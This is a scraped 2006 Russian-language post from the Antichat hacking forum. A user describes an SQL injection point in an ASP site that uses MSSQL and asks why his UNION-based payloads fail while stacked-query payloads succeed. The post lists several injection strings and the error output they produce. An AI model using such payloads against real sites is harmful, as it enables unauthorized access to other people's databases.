ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Редкая трабла с MsSQL
  #1  
Старый 05.06.2006, 02:30
Аватар для Xex
Xex
Banned
Регистрация: 10.07.2005
Сообщений: 224
Провел на форуме:
1062041

Репутация: 50
По умолчанию Редкая трабла с MsSQL

Привет!
нашел инъекцию следующего вида
http://www.server.com/products.asp?cat=Cars'

Код:
Microsoft OLE DB Provider for SQL Server error '80040e14' 

Unclosed quotation mark before the character string 'CAR''. 

/include/ADOFunctions.asp, line 58
При попытке написать UNION:
http://www.server.com/products.asp?cat=CAR'%20UNION%20ALL%20SELECT%20*%2 0FROM%20INFORMATION_SCHEMA.TABLES--

ругается
Код:
Microsoft OLE DB Provider for SQL Server error '80040e14' 

Incorrect syntax near the keyword 'UNION'. 

/include/ADOFunctions.asp, line 58
Проверил синтакцис сто раз.
фильтрации никакой,
запросы вида
http://www.server.com/products.asp?cat=CAR' or 1=1--
ругется на синтакцис "or".

products.asp?cat=CAR';SELECT%20*%20FROM%20INFORMAT ION_SCHEMA.TABLES--
работает без проблем,
Думал фильтрует юнионы, оры и энды,но запрос вида

products.asp?cat=CAR';SELECT%20*%20FROM%20INFORMAT ION_SCHEMA.TABLES%20UNION%20SELECT%20*%20FROM%20IN FORMATION_SCHEMA.TABLES--
тоже успешно выполняется.

Думал, что все фильтруется после кавычки, однако если ввести немного "подпорченный" запрос(последний прведенный), то он ругается.

Помогите советом.
Пасиб.

Последний раз редактировалось Xex; 05.06.2006 в 02:32..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Mssql. Ошибки синтаксиса gadjet Уязвимости 3 14.02.2007 04:57
Окажите гуманитарную помощь по MsSQL krutan Форумы 1 06.05.2006 18:55
MSSQL inj несколько вопросов a_k50 PHP, PERL, MySQL, JavaScript 1 25.03.2006 03:56
траблы с Mssql gadjet Уязвимости 2 04.03.2006 19:38
аноним. прокси + мыло = трабла .::Pu$$yc@T::. E-Mail 17 28.02.2006 21:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ